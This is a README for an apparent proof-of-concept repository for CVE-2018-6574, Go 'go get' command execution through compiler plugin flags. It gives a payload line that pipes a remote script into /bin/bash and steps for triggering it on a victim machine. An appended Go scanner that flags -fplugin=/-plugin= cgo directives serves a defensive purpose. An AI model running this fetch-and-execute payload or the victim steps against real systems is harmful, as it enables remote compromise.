Go before 1.8.7, Go 1.9.x before 1.9.4, and Go 1.10 pre-releases before Go 1.10rc2 allow "go get" remote command execution during source code build, by leveraging the gcc or clang plugin feature, because -fplugin= and -plugin= arguments were not blocked. (from mitre)
The command was compiled into the dynamic library calc_darwin.so. The current command is curl newton.cycarrier:8002 | /bin/bash. It was used as the initial access step of a program. You have to host a file server on port 8002 and bind the host to your IP.
First, you have to install the required version of golang on the victim. Then, host this repo on an accessible git server. Finally, use the go get command to fetch this repo, and the command will be executed automatically.
Take my repo as an example. You have to use the following command:
go get github.com/frozenkp/CVE-2018-6574
This repo is for evaluation purposes only.
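A defensive check for the arguments named in the CVE description at the top, as an added example that is not part of this repo: it scans Go source text for #cgo directives that pass -fplugin= or -plugin= flags, so a dependency can be reviewed before it is built. The names ScanCgoFlags and Finding and the sample source are constructed for illustration.

```go
package main

import (
	"bufio"
	"fmt"
	"strings"
)

// Finding is one cgo flag that names a plugin: source line, cgo variable, argument.
type Finding struct{ Line int; Var, Flag string }

// blocked holds the two argument prefixes named in the CVE description.
var blocked = []string{"-fplugin=", "-plugin="}

// ScanCgoFlags reports every #cgo directive in src that passes a plugin argument.
func ScanCgoFlags(src string) []Finding {
	var out []Finding
	sc := bufio.NewScanner(strings.NewReader(src))
	for n := 1; sc.Scan(); n++ {
		// Directives sit in the comment above `import "C"`, in // or /* */ style.
		line := strings.TrimSpace(strings.TrimPrefix(strings.TrimSpace(sc.Text()), "//"))
		i := strings.Index(line, ":")
		if !strings.HasPrefix(line, "#cgo") || i < 0 {
			continue
		}
		names := strings.Fields(line[:i]) // "#cgo", optional build constraints, variable
		for _, f := range strings.Fields(line[i+1:]) {
			for _, p := range blocked {
				if strings.HasPrefix(f, p) {
					out = append(out, Finding{n, names[len(names)-1], f})
				}
			}
		}
	}
	return out
}

// sample is a constructed source file, not taken from the repository.
const sample = `package demo
// #cgo CFLAGS: -O2 -fplugin=./example_plugin.so
// #cgo linux LDFLAGS: -lm -plugin=./example_plugin.so
import "C"
`

func main() {
	for _, f := range ScanCgoFlags(sample) {
		fmt.Printf("line %d: %s passes %s\n", f.Line, f.Var, f.Flag)
	}
}
```

Only the two prefixes from the CVE text are matched; a hit means the package should not be fetched or built with an affected Go version.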